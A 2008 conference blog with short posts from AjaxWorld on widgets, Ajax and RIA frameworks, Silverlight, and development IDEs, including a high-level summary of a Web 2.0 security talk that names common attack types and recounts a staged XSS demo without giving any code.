The Social Aggregator

Posted April 14, 2008
Filed under: Web 2.0 & Social Apps | Tags:
* Leave a Comment

Justin Thorp of Clearspring came to speak about Widgets and how the web is moving away from the “webpage”. He was pretty entertaining… he definitely had the “hip/cool” vibe going and did a lot of namedropping of cool sites. His company has created a widget platform (built in java) called Launchpad that is basically a mashup creator similar to iGoogle. He gave a statistic that 81% of all web users have seen a widget, and that personalization will be more of a demand in the future.

He gave a few examples of sites that he thought were interesting:

buzzword alert!

Posted April 14, 2008
Filed under: buzzword alert! | Tags:
* Leave a Comment

Widget – “mini web apps placed inside other web apps.”

Opening Keynote – Day 3

Posted April 14, 2008
Filed under: The Big Picture | Tags:
* Leave a Comment

Anthony Franco of effectiveui spoke in general about the future of RIAs.  A main point that he tried to get across was that Ajax isn’t something that should be used just for the sake of using it.  As developers, we need make sure we figure out exactly what the client’s needs are and build our requirements off of that.  Ajax is supposed to be used to create more engaging user experiences – but sometimes can lead to overkill.

I told you, there’s more!

Posted April 14, 2008
Filed under: Uncategorized |
* Leave a Comment

Ok, so it took me a while to continue this blog since things are so busy around here… but I’m going to try to make this a part of my daily routine.  So, continuing on…

I gave my 2 cents at AjaxWorld and this is what they said…

Posted March 21, 2008
Filed under: Uncategorized | Tags: , , ,
* Leave a Comment

DOH!

Ok, that’s not really what happened. But this is a real slide from one of the presenters speaking about a commercial application for building enterprise Web 2.0 applications – available from Nexaweb. I don’t have a lot to say about the application, but my first impression was that it was most likely lacking real world usage… But, you can download free demos from their site and decide for yourself, if you feel so inclined.

More to come…

Posted March 21, 2008
Filed under: Uncategorized | Tags: , , , ,
* Leave a Comment

The conference is over but I have a lot more to add.  They pretty much saved the best for last, so there’s a lot to cover.  So many powerpoint slides, so little time…  Expect posts on these topics, and more soon:

  • FLEX
  • Reverse Ajax
  • Widgets
  • New Ajax Standards
  • XQuery

Understanding Top Web 2.0 Security Attacks

Posted March 20, 2008
Filed under: The Big Picture, Web 2.0 & Social Apps | Tags: , , , , , ,
* Comments (3)

One of the most eye-opening sessions of the conference so far has been this one on Web 2.0 security. The speaker, Danny Allan from Watchfire, an IBM company, was a fantastic speaker and one of the most engaging of the week. There are a lot of security risks in just about all rich internet applications on the web today, mostly due to the way the world wide web was built – there are all kinds of ways hackers can attack a web site to gain access to secure information. Why would they want to gain access to this information? Mostly, almost always, for financial gain.

He listed out 3 types of core attacks that may be used:

  1. Browser attacks: such as plugin flaws.
  2. Server side attacks: this is the more traditional attack such as SQL injection attacks.
  3. Client side attacks: Using XSS (cross-site scripting), CSRF, etc hackers can gain control over a users computer. There are 108 ways to exploit XSS attacks.

The main technologies that are attacked are:

  1. Browsers
  2. Ajax
  3. Web Services

It’s also worth noting that mashups are especially difficult to protect. There is the possibility that an attack in one widget could pull sensitive data from other widgets. Also it’s difficult to know when that happens because the DOM doesn’t recognize these sorts of attacks.

Other types of attacks mentioned are JS hijacking, prototype hijacking (hackers are able to basically replace your javascript function with their own), cache poisoning, DNS attacks, DNS Reminding attacks.

He then proceded to show us this demo of a XSS proxy which allowed him to gain control of a users’ bank information (not a real bank site) by pasting some malicious javascript code in the site search box and submitting it. Using the XSS proxy, he basically had a hacker admin panel that allowed him to view all kinds of data he ‘stole’ from the user, including every link they clicked, every page viewed, all passwords and data typed in text fields, and basically anything sent through the browser you can think of. Since this was staged and just a demo, there are of course a lot of things that needed to be in place for this to work correctly but the point is, it’s possible. One of the things I thought was really interesting is that he actually leveraged CSS code (href tag styles) in his algorithm to gain access to this fake person’s data. Yikes!

Day 3 Kickoff

Posted March 20, 2008
Filed under: Uncategorized |
* Leave a Comment

It’s another jam-packed 12 hour day here at the ajaxworld conference.  Looks like we have internet access for a bit so I may be posting through the day.

Spicing up user experience w/ Silverlight – Tech Session, Day 2

Posted March 19, 2008
Filed under: Aspects of RIA Software | Tags: , , ,
* Leave a Comment

This session was probably the biggest disappointment of the conference so far… not that I really have a lot of high hopes for Microsoft’s RIA framework, but this was just ridiculous.  The speaker was not an employee of MS, so I’ll cut her some slack… but if her attitude towards the framework is any indication of the real motives behind Microsoft creating Silverlight then they simply don’t get it.  Several times the speaker repeated the line “isn’t this cool!?” to the room full of dead quiet developers.  Some guy spoke up, “Doesn’t Flash already do this?”.  Yea, it’s basically exactly like Flash, except maybe more like Flash 4.  She was all excited about the drag-and-drop controls, most of which do already exist in flash (graphing, sliders, etc).  A lot of people, including myself, jumped out of there a few minutes early…

IDE + Framework Roundup 1

Posted March 19, 2008
Filed under: iPhone Development, The Big Picture, Web 2.0 & Social Apps | Tags: , , , ,
* Leave a Comment

A few of the sessions that I’ve decided not to go into detail about were basically sales pitches (I’m using the term loosely – Most of these are open source and free to use) for a development IDE or framework… here’s a few of note:

  • Aptana Studio & “Jaxer” Ajax Server – This IDE has support for HTML, CSS, Javascript, PHP, and Ruby On Rails. It’s interesting because it supports most of the popular javascript libraries (prototype, dojo, etc) and offers some pretty slick code completion. It also seems like a pretty swell IDE for the iPhone SDK (The speaker built a small web app for the iPhone in a matter of minutes). The Ajax server allows for server-side javascript.
  • jMaki -A mashup framework, in beta, created by Sun Microsystems. This seems to have a lot of potential. Basically they created wrappers for several popular js toolkits which allows developers to use PHP, JSP, or whatever to embed the javascript code. It abstracts the event model of whatever particular js library you use into your language of choice. It is supported (with the help of plugins) in Netbeans, Eclipse, and ANT-based tools.
  • Webtop – Also created by Sun, Webtop is based on jMaki and is essentially an open source, extensible iGoogle clone.
  • ICEfaces – Java EE Framework for building asynchronous, real-time social web applications.
« Older Entries
Follow

Get every new post delivered to your Inbox.